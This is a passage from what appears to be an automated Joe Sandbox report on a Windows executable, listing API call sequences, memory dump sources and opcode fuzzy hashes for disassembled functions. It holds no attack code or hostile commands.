                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectObjectlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2354491011-3916222277
                                                                                                                                              • Opcode ID: 9d852aacc324d793c307b9bc4f5cb1ae80cc7621a4b1ed0e7d4aaa0040eccceb
                                                                                                                                              • Instruction ID: 28e09a9122b547e86938a5d239e18cad7ca67ec09992f0ac5eed7e9960d5d504
                                                                                                                                              • Opcode Fuzzy Hash: 9d852aacc324d793c307b9bc4f5cb1ae80cc7621a4b1ed0e7d4aaa0040eccceb
                                                                                                                                              • Instruction Fuzzy Hash: 32417A71E00219EFCB20DFA6D885AEEBBB4BF18308F50452EE415E3291E7789A45CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0042A71B
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 0042A735
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,Software\), ref: 0042A74F
                                                                                                                                              • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 0042A765
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEnumOpenQueryValue
                                                                                                                                              • String ID: Software\
                                                                                                                                              • API String ID: 3984146545-964853688
                                                                                                                                              • Opcode ID: 9845bd2fcb0797600897e3fcf3e96c38015a830924c55a3160526b0b273f9273
                                                                                                                                              • Instruction ID: 60a233a4efbdb4d877ad5cbd16216c248d17419bcb0c5f4008330a88f52c4ae4
                                                                                                                                              • Opcode Fuzzy Hash: 9845bd2fcb0797600897e3fcf3e96c38015a830924c55a3160526b0b273f9273
                                                                                                                                              • Instruction Fuzzy Hash: 3341A031A00119ABCF11DBA0DC85EEFB7B9FF88304F50012AF511B3291DB389A15CB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 0042493D
                                                                                                                                              • GetWindowLongA.USER32(?,000000FC), ref: 0042494F
                                                                                                                                              • GetWindowLongA.USER32(?,000000FC), ref: 00424960
                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 0042497C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                              • String ID: (
                                                                                                                                              • API String ID: 2178440468-3887548279
                                                                                                                                              • Opcode ID: e0b753035cb70a9a5eef04e921d7a8f31782a4019434a00ab1b1827a1127cb12
                                                                                                                                              • Instruction ID: 3707caef856736254b48c76daa378133d04f0dbce0ae591b3731a783b4f3e6c9
                                                                                                                                              • Opcode Fuzzy Hash: e0b753035cb70a9a5eef04e921d7a8f31782a4019434a00ab1b1827a1127cb12
                                                                                                                                              • Instruction Fuzzy Hash: A531D2747006209FCB20BF79E884A6BB7B4FF84314F94062EE54197791DB78E845CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32), ref: 025CD3E5
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 025CD3F5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: GetSystemTimePreciseAsFileTime$Invalid$kernel32
                                                                                                                                              • API String ID: 1646373207-2690871627
                                                                                                                                              • Opcode ID: db2df966f530ecf27efd42f2e3b42c249f3b630e81deea6c47e8ff89f1a37244
                                                                                                                                              • Instruction ID: 3251ea4002ff243af219edb590f8c58f21d809fe1551ea6b6b2aa7ed5ec10e9e
                                                                                                                                              • Opcode Fuzzy Hash: db2df966f530ecf27efd42f2e3b42c249f3b630e81deea6c47e8ff89f1a37244
                                                                                                                                              • Instruction Fuzzy Hash: 0011B2B1B403009FD30C9F59898871A7BF6BB84785F5AC82DD80ED7350E375A884CB95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00422A4C
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00422A6B
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00422A76
                                                                                                                                              • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00422A8C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$EnabledItemLongMessageSend
                                                                                                                                              • String ID: Edit
                                                                                                                                              • API String ID: 3499652902-554135844
                                                                                                                                              • Opcode ID: 66f3ca61536d6a4b5c74c82b61e0e054e33ba564fb4b2e00f887f035e959c592
                                                                                                                                              • Instruction ID: 6ee10451ae2c8e78b307aaf30a1710947c025f2baedac84a9ff3f14969e02c54
                                                                                                                                              • Opcode Fuzzy Hash: 66f3ca61536d6a4b5c74c82b61e0e054e33ba564fb4b2e00f887f035e959c592
                                                                                                                                              • Instruction Fuzzy Hash: 18018E303003327AEA306A66AE05F6BAAA49B54714FD4493BA441D2AA0DFE8DC42C56C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll), ref: 025BF7C5
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 025BF7D5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: Invalid$NtCreateKeyedEvent$ntdll
                                                                                                                                              • API String ID: 1646373207-3729888764
                                                                                                                                              • Opcode ID: 3c2b53632a35c1a5eb1eead99cbcb11f700ae754f9a61b1af955f26570a73cb3
                                                                                                                                              • Instruction ID: 3e1d4e926e011bc7fedac0a3767c93bfa554e5c868f7b0e8df13135b82a0ae41
                                                                                                                                              • Opcode Fuzzy Hash: 3c2b53632a35c1a5eb1eead99cbcb11f700ae754f9a61b1af955f26570a73cb3
                                                                                                                                              • Instruction Fuzzy Hash: A511ADB0D403099FDB64DFA1CA087EEBBB8FF04704F140819E915A7A40D3346148CFA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,39838EA3,?,?,00000000,025F197B,000000FF,?,025E25E4,025E26C8,?,025E25B8,00000000), ref: 025E263D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 025E264F
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,025F197B,000000FF,?,025E25E4,025E26C8,?,025E25B8,00000000), ref: 025E2671
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                              • Opcode ID: 202b9e2b47566bd138c67ef4f9af524af4cd92a4dcbabd1609bd29b4fda764a9
                                                                                                                                              • Instruction ID: 7c60d9db11796c5290cc2db8d90085d40fa0ef59457a9ffc1b94891b1eef10db
                                                                                                                                              • Opcode Fuzzy Hash: 202b9e2b47566bd138c67ef4f9af524af4cd92a4dcbabd1609bd29b4fda764a9
                                                                                                                                              • Instruction Fuzzy Hash: 6D01A771940619ABDB158F50DC05FAE7BBCFB04B15F004A25FD12E2290DB749914CA98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042A21C
                                                                                                                                              • PathFindExtensionA.SHLWAPI(?), ref: 0042A229
                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0042A23F
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,%s.dll), ref: 0042A247
                                                                                                                                                • Part of subcall function 00429F0B: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00429F31
                                                                                                                                                • Part of subcall function 00429F0B: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00429F3C
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(?), ref: 00429F6D
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(?), ref: 00429F75
                                                                                                                                                • Part of subcall function 00429F0B: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00429F82
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(?), ref: 00429F9C
                                                                                                                                                • Part of subcall function 00429F0B: ConvertDefaultLocale.KERNEL32(000003FF), ref: 00429FA2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConvertDefaultLocale$AddressModuleProclstrcpy$ExtensionFileFindHandleNamePath
                                                                                                                                              • String ID: %s.dll
                                                                                                                                              • API String ID: 2054749690-3668843792
                                                                                                                                              • Opcode ID: 82a8751b84f09603ba11f481d45c7ea045fa609579e678804dedf504626bede6
                                                                                                                                              • Instruction ID: 7c4c11a2dddb72ba6e02242f47b30f39fdadc108ab8537c06b584eb29b98c2af
                                                                                                                                              • Opcode Fuzzy Hash: 82a8751b84f09603ba11f481d45c7ea045fa609579e678804dedf504626bede6
                                                                                                                                              • Instruction Fuzzy Hash: E4F04FB9900218EBCB10EBA0ED49DDE7BBCEB48744F5000B6F945D7150DA74AE46CF54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042BD48: EnterCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD76
                                                                                                                                                • Part of subcall function 0042BD48: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD88
                                                                                                                                                • Part of subcall function 0042BD48: LeaveCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD91
                                                                                                                                                • Part of subcall function 0042BD48: EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BDA3
                                                                                                                                              • LoadLibraryA.KERNEL32(hhctrl.ocx,0042AFC8,0000000C), ref: 00425209
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0042521C
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042522C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterLibrary$AddressFreeInitializeLeaveLoadProc
                                                                                                                                              • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                              • API String ID: 823138501-63838506
                                                                                                                                              • Opcode ID: 3235c455f9abb7d201993a8a1dfe31dcfc0dd767c571edfdb62f33c42e434520
                                                                                                                                              • Instruction ID: 01c63ba424afe4957a6b3b467abc3637d649f32ce2fea976250ac632f5fbc3be
                                                                                                                                              • Opcode Fuzzy Hash: 3235c455f9abb7d201993a8a1dfe31dcfc0dd767c571edfdb62f33c42e434520
                                                                                                                                              • Instruction Fuzzy Hash: 90F08130744721EBD7209F61E90AB07B7E1AF54B06F80883EF046A20A0C73998148B2A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(mscoree.dll,004173A1,?,?,004173C2,?,00000001,00000000,0041CA21,00000003), ref: 0041722F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041723F
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00417253
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 75539706-1276376045
                                                                                                                                              • Opcode ID: 646f169376bb85f1c7a0c0c6dfab7f1782379c0f79f95e05adf5e4d60cba3fd9
                                                                                                                                              • Instruction ID: 6d5ffb320b5c84a2b93882608c5028e86e814d1ab6817c3f9ce84d69c9d90742
                                                                                                                                              • Opcode Fuzzy Hash: 646f169376bb85f1c7a0c0c6dfab7f1782379c0f79f95e05adf5e4d60cba3fd9
                                                                                                                                              • Instruction Fuzzy Hash: 96D0C7303C4200EBD6201B71DD0DE1B3A74AE61F01B84D479B851D1161CB75DC15992D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00413C4D
                                                                                                                                              • VariantClear.OLEAUT32(00000007), ref: 00413F7B
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004140F0
                                                                                                                                                • Part of subcall function 004150C1: VariantCopy.OLEAUT32(?,?), ref: 004150C9
                                                                                                                                                • Part of subcall function 0041068B: SystemTimeToVariantTime.OLEAUT32(?), ref: 004106D9
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004140D0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Clear$Time$CopySystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2058121879-0
                                                                                                                                              • Opcode ID: 5fca67dab6d645ae0528530928cc235c45b69b13cbb83de34b48013661cf2efe
                                                                                                                                              • Instruction ID: e55dc214bb347d680c00c7b0307744ac7d9360fc785a26e3059a799186a01771
                                                                                                                                              • Opcode Fuzzy Hash: 5fca67dab6d645ae0528530928cc235c45b69b13cbb83de34b48013661cf2efe
                                                                                                                                              • Instruction Fuzzy Hash: 94E16F7090011CEACF15DBA5C890AFEBBB9FF48304F14809BE855A7291DB385A89DB65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004141BB
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00414238
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00414246
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00414254
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00414269
                                                                                                                                                • Part of subcall function 00413BE3: VariantClear.OLEAUT32(?), ref: 00413C4D
                                                                                                                                                • Part of subcall function 004150C1: VariantCopy.OLEAUT32(?,?), ref: 004150C9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$ClearFreeString$Copy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3003973349-0
                                                                                                                                              • Opcode ID: 07ac1883145407bfd2158c196e3fcb000a03d1c9a0b2083fd5ca9be8544c246f
                                                                                                                                              • Instruction ID: 42ef2da4cf5b7abc8d447338bc900a50df6f05a4ba720132606da66aa4bd1274
                                                                                                                                              • Opcode Fuzzy Hash: 07ac1883145407bfd2158c196e3fcb000a03d1c9a0b2083fd5ca9be8544c246f
                                                                                                                                              • Instruction Fuzzy Hash: E65107B190020AEFCB14CFE4C9849EEBBB9FF88304F64456EE516A7251D734A985CB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040C719
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040C725
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040C73A
                                                                                                                                              • FreeResource.KERNEL32(00000000), ref: 0040C76C
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0040C810
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindFreeItemLoadLock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 996205394-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Strings
                                                                                                                                              • nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,, xrefs: 0258563C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: nullfalsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 1910495013-2124985433
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004292DB: GetParent.USER32(?), ref: 0042932E
                                                                                                                                                • Part of subcall function 004292DB: GetLastActivePopup.USER32(?), ref: 0042933D
                                                                                                                                                • Part of subcall function 004292DB: IsWindowEnabled.USER32(?), ref: 00429352
                                                                                                                                                • Part of subcall function 004292DB: EnableWindow.USER32(?,00000000), ref: 00429365
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 004293B2
                                                                                                                                              • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 004293C6
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00429437
                                                                                                                                              • MessageBoxA.USER32(?,?,?,?), ref: 00429445
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00429461
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 489645344-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC2D6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC2F1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC2FD
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC309
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC313
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,025B5E00), ref: 025AC325
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 025858DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02585969
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 025860D2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02600458,026003AC,02600574), ref: 02586105
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258632F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID: falsetrue\"\\\b\f\n\r\t0123456789abcdef[],{ ,
                                                                                                                                              • API String ID: 1910495013-2845428148
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetMapMode.GDI32(?,?,?,?,?,?,0040F257,?,00000000,?,7689CA20), ref: 00429CC3
                                                                                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00429CFD
                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00429D06
                                                                                                                                                • Part of subcall function 0042873E: MulDiv.KERNEL32(?,00000000,00000000), ref: 0042877B
                                                                                                                                                • Part of subcall function 0042873E: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 00428796
                                                                                                                                              • MulDiv.KERNEL32(?,000009EC,00000060), ref: 00429D2A
                                                                                                                                              • MulDiv.KERNEL32(00000000,000009EC,7689CA20), ref: 00429D35
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CapsDevice$Mode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 696222070-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetMapMode.GDI32(?,00000000,?,?,?,?,0040F28B,?), ref: 00429D51
                                                                                                                                              • GetDeviceCaps.GDI32(?,00000058), ref: 00429D8B
                                                                                                                                              • GetDeviceCaps.GDI32(?,0000005A), ref: 00429D94
                                                                                                                                                • Part of subcall function 004286DB: MulDiv.KERNEL32(0040F28B,00000000,00000000), ref: 00428718
                                                                                                                                                • Part of subcall function 004286DB: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 00428733
                                                                                                                                              • MulDiv.KERNEL32(0040F28B,00000060,000009EC), ref: 00429DB8
                                                                                                                                              • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 00429DC3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
